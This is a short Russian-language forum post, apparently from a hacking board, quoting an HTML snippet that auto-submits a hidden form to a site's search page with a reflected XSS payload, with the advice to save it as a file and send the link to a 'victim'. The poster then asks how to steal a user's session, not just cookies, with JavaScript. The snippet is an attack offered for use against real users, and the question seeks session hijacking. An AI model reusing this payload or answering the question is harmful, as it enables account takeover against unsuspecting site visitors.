09.09.2008, 23:18
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 47
Провел на форуме:
71868
Репутация:
72
|
|
Сообщение от +toxa+
PHP код:
<form name='wtf' method='post' action='http://site.ru/search.php'>
<input type='hidden' name='search' value='"><script>alert(/xss/)</script>'>
</form>
<script>wtf.submit();</script>
правишь то что тебе надо, сохраняешь в .html и кидаешь ссылку на файл жертве Можно ли как то на JavaScript выдернуть сессию?
то есть не куки а сессию...?
|
|
|